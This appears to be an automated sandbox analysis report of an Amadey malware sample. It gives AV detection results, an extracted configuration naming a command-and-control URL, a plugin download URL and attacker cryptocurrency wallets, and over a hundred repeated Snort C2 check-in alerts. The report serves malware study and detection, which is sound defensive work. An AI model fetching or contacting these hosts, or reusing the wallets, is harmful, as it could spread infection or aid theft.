                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450234802027700 02/06/23-14:19:15.265931
                          SID:2027700
                          Source Port:50234
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449745802027700 02/06/23-14:16:57.611373
                          SID:2027700
                          Source Port:49745
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450216802027700 02/06/23-14:19:10.901301
                          SID:2027700
                          Source Port:50216
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          AV Detection

                          Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll | Avira URL Cloud: Label: malware
                          Source: file.exe | ReversingLabs: Detection: 66%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll | ReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | ReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe | ReversingLabs: Detection: 51%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | ReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe | ReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | ReversingLabs: Detection: 81%
                          Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | ReversingLabs: Detection: 80%
                          Source: file.exe | Joe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | Joe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe | Joe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe | Joe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | Joe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | Joe Sandbox ML: detected
                          Source: 0.3.file.exe.4aa7620.0.raw.unpack | Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                          Source: 20.2.rundll32.exe.6e7e0000.0.unpack | Malware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010C2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe | Code function: 1_2_01092F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA

                          Compliance

                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe | Unpacked PE file: 2.2.ajAf.exe.400000.0.unpack
                          Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: wextract.pdb source: file.exe, bjAg.exe.0.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.307249151.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000008.00000000.443385689.000000000019E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000009.00000000.445170122.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000009.00000002.828007613.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000015.00000000.451693507.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000015.00000002.452166128.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe.0.dr, mnolyk.exe.8.dr
                          Source: Binary string: Healer.pdb source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414918695.00000000025B0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: wextract.pdbGCTL source: file.exe, bjAg.exe.0.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bjAg.exe, 00000001.00000003.308200379.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, bjAg.exe, 00000001.00000003.308124851.0000000004873000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.415603805.0000000000792000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                          Source: Binary string: _.pdb source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: rundll32.exe, 00000014.00000002.827912783.000000006E7EF000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.9.dr, clip64[1].dll.9.dr
                          Source: Binary string: Healer.pdbH5 source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414918695.00000000025B0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\vot.pdb source: bjAg.exe, 00000001.00000003.308124851.000000000485F000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000000.308294007.0000000000401000.00000020.00000001.01000000.00000005.sdmp, ajAf.exe.1.dr
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010C2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe | Code function: 1_2_01092390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | Code function: 8_2_0018FC58 FindFirstFileExW

                          Networking

                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49691 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49815 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49816 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49817 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49818 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49819 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49820 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49821 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49822 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49823 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49824 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49825 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49826 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49827 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49828 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49829 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49830 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49831 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49832 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49833 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49834 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49835 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49836 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49837 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49838 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49839 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49840 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49841 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49842 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49843 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49844 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49845 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49846 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49847 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49848 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49849 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49850 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49851 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49852 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49853 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49854 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49855 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49856 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49857 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49858 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49859 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49860 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49861 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49862 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49863 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49864 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49865 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49866 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49867 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49868 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49869 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49870 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49871 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49872 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49873 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49874 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49875 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49876 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49877 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49878 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49879 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49880 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49881 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49882 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49883 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49884 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49885 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49886 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49887 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49888 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49889 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49890 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49891 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49892 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49893 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49894 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49895 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49896 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49897 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49898 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49899 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49900 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49901 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49902 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49903 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49904 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49905 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49906 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49907 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49908 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49909 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49910 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49911 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49912 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49913 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49914 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49915 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49916 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49917 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49918 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49919 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49920 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49921 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49922 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49923 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49924 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49925 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49926 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49927 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49928 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49929 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49930 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49931 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49932 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49933 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49934 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49935 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49936 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49937 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49938 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49939 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49940 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49941 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49942 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49943 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49944 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49945 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49946 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49947 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49948 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49949 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49950 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49951 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49952 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49953 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49954 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49955 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49956 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49957 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49958 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49959 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49960 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49961 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49962 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49963 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49964 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49965 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49966 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49967 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49968 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49969 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49970 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49971 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49972 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49973 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49974 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49975 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49976 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49977 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49978 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49979 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49980 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49981 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49982 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49983 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49984 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49985 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49986 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49987 -> 62.204.41.4:80
